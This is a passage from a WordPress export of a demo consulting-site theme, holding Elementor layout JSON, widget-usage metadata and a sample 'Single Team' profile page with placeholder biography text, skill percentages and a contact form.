fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"2b58641","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"23fa50d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team6.jpg","id":695},"member_name":"Adam Oswald","member_extra":"CHIEF MARKETING OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"42171b0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1c6c26d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team7.jpg","id":696},"member_name":"Kate Green","member_extra":"CHIEF FINANCIAL OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"23f0a2f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"df675fc","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team8.jpg","id":697},"member_name":"Harry Septem","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"b3c9551","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"cfc4ff2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"background_background":"classic","background_color":"#262832","_inline_size_tablet":100},"elements":[{"id":"6f8488f","elType":"section","settings":{"content_width":{"unit":"px","size":525,"sizes":[]},"css_classes":"mr_0","padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"%","top":"10","right":"20","bottom":"10","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4e25f9a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a001cee","elType":"widget","settings":{"sub":"our benefits","title":"Entrust Your Project to  Our Specialists","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"6a5318a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0ba065e","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"1df2f14","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"24c3ac5","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"337cb49","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d6d5985","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-team.jpg","id":699},"image_size":"full","_margin_mobile":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a9b5cf2","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"192","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"170","left":"0","isLinked":false}},"elements":[{"id":"4e2afe0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"78c7db3","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e4b3144","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"7e32710","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"5aa0738","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"bf1cbf3","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"d1cccc6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"398c80a","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"15c47ef","elType":"section","settings":{"content_width":{"unit":"px","size":1340,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"237daa6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7a438e9","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#4B83FC","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"8bfca9a","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"eadf1a3","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"4b7dca5","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"25c8dd0","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:22;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:22;s:19:"_inline_size_tablet";i:18;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:1;s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:14:"subtitle_style";i:3;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:4:{s:6:"layout";i:5;s:3:"gap";i:4;s:13:"content_width";i:2;s:16:"content_position";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:8:{s:7:"padding";i:7;s:14:"padding_mobile";i:5;s:11:"css_classes";i:1;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:5:{s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:2;s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:8;s:11:"member_name";i:7;s:12:"member_extra";i:6;s:12:"social_share";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:10:"info_style";a:2:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:2:{s:8:"bg_color";i:3;s:10:"lbar_color";i:3;}s:18:"style_text_section";a:2:{s:11:"title_color";i:3;s:6:"per_bg";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/</link>
		<pubDate>Thu, 10 Sep 2020 02:50:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=711</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="530" height="500" src="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg 530w, https://maxbizz.s3.amazonaws.com/images/image1-single-team-300x283.jpg 300w" sizes="(max-width: 530px) 100vw, 530px" />											
			<h3>Peter Perish</h3>		
			<h6>chief business project</h6>		
		<ul><li>Department: Business Department</li><li>Experience: 15 Years</li><li>Email: perish.maxbizz@mail.com</li><li>Phone: +1-800-456-478-23</li><li>Fax: +1-800-456-478-24</li></ul>		
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
			<h5>My Biography</h5>		
		<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app a mobile app development company has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>My Soft & Hard Skills</h5>		
		<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.</p>		
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f736-o1" method="post" novalidate="novalidate">
<input type="hidden" name="_wpcf7" value="736" />
<input type="hidden" name="_wpcf7_version" value="5.2.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f736-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Contact Me</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send a message</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>711</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 02:50:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 02:50:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"b501399","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"90","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6365e43","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4b4c82c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","content_position":"middle","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[{"id":"fcac4d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"98f528e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-single-team.jpg","id":713},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"1070f44","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"30","bottom":"30","left":"30","isLinked":false}},"elements":[{"id":"bfb6219","elType":"widget","settings":{"title":"Peter Perish","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77b067d","elType":"widget","settings":{"title":"chief business project","header_size":"h6","title_color":"#4B83FC","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e4d0805","elType":"widget","settings":{"editor":"<ul class=\"member-info\"><li><span class=\"text-dark\">Department:<\/span> Business Department<\/li><li><span class=\"text-dark\">Experience:<\/span> 15 Years<\/li><li><span class=\"text-dark\">Email: <\/span>perish.maxbizz@mail.com<\/li><li><span class=\"text-dark\">Phone: <\/span>+1-800-456-478-23<\/li><li><span class=\"text-dark\">Fax: <\/span>+1-800-456-478-24<\/li><\/ul>"},"elements":[],"widgetType":"text-editor"},{"id":"1453173","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4","align":"left"},"elements":[],"widgetType":"social-icons"}],"isInner":true}],"isInner":true},{"id":"a742530","elType":"widget","settings":{"title":"My Biography","header_size":"h5","_padding":{"unit":"px","top":"60","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ef6bdc8","elType":"widget","settings":{"editor":"<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app <span style=\"color: #4b83fc;\">a mobile app development company<\/span> has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"984c88f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"865ab3e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bbffe7","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"da47a10","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a81434a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1541169","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ca57b45","elType":"widget","settings":{"bar_style":"circle","title":"finance 